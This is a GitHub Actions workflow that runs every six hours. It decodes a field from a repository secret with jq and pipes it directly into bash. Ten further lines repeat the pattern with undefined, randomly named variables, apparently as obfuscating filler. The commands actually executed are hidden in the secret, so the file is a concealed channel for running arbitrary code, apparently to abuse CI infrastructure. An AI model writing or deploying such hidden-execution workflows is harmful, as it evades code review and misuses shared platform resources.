name: wobunengsizaizheli
on:
  workflow_dispatch:
  schedule:
    - cron: '57 0/6 * * *'
jobs:  # 6468
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wobunengsizaizheli
        env:
          h4: ${{ secrets.h4 }}
        run: |
          echo $h4 | jq -r .ravv74172 | /bin/bash
          echo $dls70 | jq -r .rffpg3629 | /bin/bash
          echo $jkdas357 | jq -r .yqo49634 | /bin/bash
          echo $cnmvt3957 | jq -r .io015 | /bin/bash
          echo $egf820 | jq -r .ka6454 | /bin/bash
          echo $bolp550 | jq -r .m1 | /bin/bash
          echo $cecb59 | jq -r .fpf76 | /bin/bash
          echo $zrj2007 | jq -r .pqow53 | /bin/bash
          echo $ggnil0 | jq -r .b3098 | /bin/bash
          echo $pdhu24 | jq -r .kazb965 | /bin/bash
          echo $e9270 | jq -r .vz69 | /bin/bash

